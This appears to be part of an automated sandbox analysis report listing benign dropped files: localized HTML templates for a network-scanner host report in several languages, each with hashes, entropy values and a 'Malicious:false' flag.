                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                  Entropy (8bit):4.839285803199877
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
                                                                                                                                                                                                  MD5:1D24AAD630182B5018D26EE86FF9E1E5
                                                                                                                                                                                                  SHA1:D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
                                                                                                                                                                                                  SHA-256:ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
                                                                                                                                                                                                  SHA-512:D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1177
                                                                                                                                                                                                  Entropy (8bit):4.903797892947706
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
                                                                                                                                                                                                  MD5:5F29203D51A1A790B22063DE29E377AC
                                                                                                                                                                                                  SHA1:C0EDB2A7108E532E66D7B730466022403C64F50D
                                                                                                                                                                                                  SHA-256:C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
                                                                                                                                                                                                  SHA-512:D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1148
                                                                                                                                                                                                  Entropy (8bit):4.7922327669232505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
                                                                                                                                                                                                  MD5:88B009CCACF0EB1B4A141470D3F160C4
                                                                                                                                                                                                  SHA1:EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
                                                                                                                                                                                                  SHA-256:D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
                                                                                                                                                                                                  SHA-512:D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1149
                                                                                                                                                                                                  Entropy (8bit):4.78207214825378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
                                                                                                                                                                                                  MD5:470C4551612D8025E2C1FF7129C75577
                                                                                                                                                                                                  SHA1:BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
                                                                                                                                                                                                  SHA-256:8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
                                                                                                                                                                                                  SHA-512:21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1187
                                                                                                                                                                                                  Entropy (8bit):5.11658152620251
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
                                                                                                                                                                                                  MD5:7B64191A23A7F9EF19022435267FED84
                                                                                                                                                                                                  SHA1:3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
                                                                                                                                                                                                  SHA-256:58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
                                                                                                                                                                                                  SHA-512:F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1162
                                                                                                                                                                                                  Entropy (8bit):5.054590965912235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKoh2Oe2B2uT2B6b2MKb2tFb2HcS2RF2TQ2n0Kt1RhRGDbYUzYKeIzAkReEs:lFoMOhsuSrXquHuSr0Kt5RGDBPReEhyv
                                                                                                                                                                                                  MD5:AAFE73E9DD742ECBA22903D3DA498688
                                                                                                                                                                                                  SHA1:AE8580EFD2267042ABB5D6EBC36A0277345BE963
                                                                                                                                                                                                  SHA-256:777877C97D0D8753B28A02666B19729B8E2046A387895CD675EF2E5EEBAE1C7A
                                                                                                                                                                                                  SHA-512:06C7B541638FA292E0438EDBD71733F35988C95A99F10B873299D55D92C66347B974969E31EFEC51B6D9F64859434243BF4252642651DC61E18F067C2A2784E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.. ..:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>...</center></b></td><td><b><center>.. .
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1169
                                                                                                                                                                                                  Entropy (8bit):4.842737243338588
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
                                                                                                                                                                                                  MD5:59A017F97EA0743C741E972819CFEA19
                                                                                                                                                                                                  SHA1:E6480E68B930A8595EACBAC255B3BFAFCC30D466
                                                                                                                                                                                                  SHA-256:71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
                                                                                                                                                                                                  SHA-512:95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1179
                                                                                                                                                                                                  Entropy (8bit):4.8880159035742965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
                                                                                                                                                                                                  MD5:1588431C36A3112355553A6967E3405E
                                                                                                                                                                                                  SHA1:0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
                                                                                                                                                                                                  SHA-256:69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
                                                                                                                                                                                                  SHA-512:F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1149
                                                                                                                                                                                                  Entropy (8bit):4.789609676615686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
                                                                                                                                                                                                  MD5:C81043ED485CCE96CDA08A5986F04E31
                                                                                                                                                                                                  SHA1:8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
                                                                                                                                                                                                  SHA-256:119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
                                                                                                                                                                                                  SHA-512:56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                                  Entropy (8bit):4.79937338549848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
                                                                                                                                                                                                  MD5:A420CCFD66627A25731173A49B1C98E1
                                                                                                                                                                                                  SHA1:CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
                                                                                                                                                                                                  SHA-256:FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
                                                                                                                                                                                                  SHA-512:99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.85707182260681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
                                                                                                                                                                                                  MD5:1AD783BD4AF434D47BD69AB818A91DFA
                                                                                                                                                                                                  SHA1:8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
                                                                                                                                                                                                  SHA-256:2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
                                                                                                                                                                                                  SHA-512:1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                  Entropy (8bit):4.820254321830803
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
                                                                                                                                                                                                  MD5:82043E0E5311A889AD7709A4A735BC76
                                                                                                                                                                                                  SHA1:F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
                                                                                                                                                                                                  SHA-256:9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
                                                                                                                                                                                                  SHA-512:E14FC86BF8DFD07536A357A760CDD2858B3536DF69D7FDA7BE06429E9969116C864D3B6036E1E05EA637621DA69F9BBD6776276C1D520F7140DB2646BB9896C0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operacional:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usu.rio:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Coment.rios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servi.o</center></b></td><td><b><center>Detalhe
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.803303336966706
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
                                                                                                                                                                                                  MD5:27C167C1E5624DC7F4D0256ABAA8632F
                                                                                                                                                                                                  SHA1:7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
                                                                                                                                                                                                  SHA-256:E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
                                                                                                                                                                                                  SHA-512:C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                  Entropy (8bit):5.137449444677303
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
                                                                                                                                                                                                  MD5:C09C9A49D20E9E03FBA82E0247B38770
                                                                                                                                                                                                  SHA1:B95253268F788CEB0B603E194C4AB1A7451B2C44
                                                                                                                                                                                                  SHA-256:717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
                                                                                                                                                                                                  SHA-512:BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
                                                                                                                                                                                                  Malicious:false
